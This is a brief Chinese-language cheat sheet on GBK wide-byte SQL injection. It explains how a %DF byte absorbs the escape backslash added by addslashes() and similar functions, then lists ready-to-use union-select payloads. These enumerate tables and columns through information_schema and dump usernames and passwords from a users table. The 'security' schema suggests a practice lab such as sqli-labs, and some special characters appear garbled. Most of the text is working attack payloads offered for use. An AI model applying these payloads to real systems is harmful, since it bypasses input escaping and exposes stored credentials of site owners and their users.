宽字节注入中常用的特殊字符:
%df
�'
�'
由于汉字编码普遍使用的是GBK编码,而这种编码是一次性读两个字节,利用这个特点就可以实现宽字节注入。
宽字节注入是针对addslashes()、mysql_real_escape_string()、mysql_escape_string()、Magic_quotes_gpc等转义函数的注入
其原理是将转义符号\与%DF组合成一个汉字,使其失去效用
注入语句:
%DF' union select 1,2,3 -- -
�' union select 1,2,3 -- -
�' union select 1,2,3 -- -
特殊符号后可接其他sql注入基本语句
作用过程:
$id = %DF ’ # → 自动转义 %df\’ # → 11011111 01011100 00100111 → 運’ #
sql注入基本语句:
order by 4
判断有多少列
union select 1,2,3
判断数据显示点
union select 1,user(),database()
显示出登录用户和数据库名
union select 1,(select group_concat(table_name) from information_schema.tables where table_schema = 'security' ),3
查看数据库有哪些表
union select 1,(select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name='users' ),3
查看对应表有哪些列
union select 1,(select group_concat(concat_ws(0x7e,username,password))from users),3
查看账号密码信息
